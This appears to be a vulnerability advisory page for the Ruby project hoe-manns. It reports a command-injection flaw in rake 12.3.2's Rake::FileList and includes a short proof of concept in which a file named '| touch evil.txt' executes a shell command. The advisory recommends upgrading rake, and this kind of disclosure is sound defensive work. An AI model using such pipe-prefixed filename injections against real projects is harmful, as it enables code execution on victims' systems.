saigkill/hoe-manns:Gemfile.lock

Vulnerabilities 1 via 1 paths
Dependencies 20
Source GitHub
Commit 530373ac

Find, fix and prevent vulnerabilities in your code.

Severity
  • 1
Status
  • 1
  • 0
  • 0
high severity

Arbitrary Code Injection

  • Vulnerable module: rake
  • Introduced through: hoe-manns@2.1.6

Detailed paths

  • Introduced through: saigkill/hoe-manns:Gemfile.lock@saigkill/hoe-manns#530373acc926351dd38fea10ed66df6c135c6078 hoe-manns@2.1.6 rake@12.3.2
    Remediation: Upgrade to hoe-manns@2.1.6.

Overview

rake is a Make-like program implemented in Ruby.

Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList when supplying a filename that begins with the pipe character |.

PoC by Katsuhiko Yoshida

% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt

Remediation

Upgrade rake to version 12.3.3 or higher.

References